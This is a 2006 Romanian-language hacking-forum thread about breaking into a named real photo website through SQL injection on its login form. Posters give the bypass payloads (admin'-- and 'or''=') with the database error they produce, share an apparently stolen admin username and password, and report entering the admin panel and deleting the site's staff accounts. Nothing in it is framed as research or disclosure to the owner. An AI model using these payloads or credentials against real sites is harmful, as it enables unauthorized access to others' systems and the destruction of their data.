sql injection in [url]http://www.fotoshop.ro[/url]

escalation666 · December 10, 2006

http://www.fotoshop.ro that's the target

Why? pt ca face spam

Vulnerabilitate:sql injection

Poc: user:admin'--

Database error: Invalid SQL: SELECT u.id_user, u.id_user_group, u.status, u.email, ug.level, u.user_name FROM site_user u, site_user_group ug WHERE u.password='' AND u.user_name='admin'--' AND ug.id_user_group = u.id_user_group

MySQL Error: 1064 (You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' AND ug.id_user_group = u.id_user_group' at line 5)

Am o lene prea mare zilele astea ca sa incerc sa aflu parola de admin.

De asemenea, daca pui la user si parola 'or''=' o sa ai o surpriza placuta.

lordping · December 10, 2006

http://www.fotoshop.ro/admin + datele de mai sus ... => acces la parola adminului si altele

J0K3R · December 10, 2006

escalation666 wrote:
De asemenea, daca pui la user si parola 'or''=' o sa ai o surpriza placuta.

Asta e un SQL Injection ? :?

December 10, 2006

user: kadaj

pass: sugipula

scuzatzi parola

asta in caz ca nu va mai merge sql injectul

Crhistmas · December 10, 2006

Io stiam ca iei sursa codului scoti java din el astfel incat sa vezi la pass ce scrii si pui ceva de genu

" * or 1+1 -- " si la user ce vrei...tu...nush daca e corect...daca nu sa ma corectati

Oricum multam

escalation666 · December 10, 2006

gg flama!

christmas...se poate si asa...probabil ai vazut chestia asta dintr-un tutorial video

e util sa faci asta cand la username trebuie sa pui o adresa de email...si javascriptul nu te lasa sa pui ceva de genu [mail]dfdf@fdwfdw.com[/mail]

Crhistmas · December 10, 2006

Aham multumesc dar exista vreun program care face munca mai usoara ?

Ras · December 10, 2006

tu vrei sa fie un buton pe care sa apesi si gata site-ul sa fie al tau ?? :@ :@

devianc3 · December 10, 2006

zice ca-i membru inexistent.. s-o jucat careva cu useru` lu` asta?

gen.. change username?

greeny · December 10, 2006

devianc3 wrote: zice ca-i membru inexistent.. s-o jucat careva cu useru` lu` asta?
gen.. change username?

Am sters tot ce era la grupul "staff" din memberlist. Nu cred ca e o problema pt noi, mai degraba pt detinatorul site-ului :@

impure · December 10, 2006

sa vad si eu cei pe situ ala sa vad care este treba

December 11, 2006

greeny wrote:
devianc3 wrote: zice ca-i membru inexistent.. s-o jucat careva cu useru` lu` asta?
gen.. change username?
Am sters tot ce era la grupul "staff" din memberlist. Nu cred ca e o problema pt noi, mai degraba pt detinatorul site-ului :@

offf numai pe distrugeri suntetzi pushi mai copii :))

Sad_Dreamer · December 11, 2006

ce lame...dupa ce ca au primit parola mura-n gura mai si sterg tot..pff..fking kids

daca eram in locul lui spiry ii dadeam ban aluia...aia sunt parteneri cu share.urbanfriends.us

thelegend · December 11, 2006

misto treaba. c my faci tov sad dreamer? ma mai tzii minte? bafta

4n4rchyl04d3r · December 17, 2006

...winers dont use copys....

Sign In

sql injection in [url]http://www.fotoshop.ro[/url]

Recommended Posts

Link to comment

Share on other sites

Link to comment

Share on other sites

Link to comment

Share on other sites

Guest flama

Link to comment

Share on other sites

Link to comment

Share on other sites

Link to comment

Share on other sites

Link to comment

Share on other sites

Link to comment

Share on other sites

Link to comment

Share on other sites

Link to comment

Share on other sites

Link to comment

Share on other sites

Guest flama

Link to comment

Share on other sites

Link to comment

Share on other sites

Link to comment

Share on other sites

Link to comment

Share on other sites

Join the conversation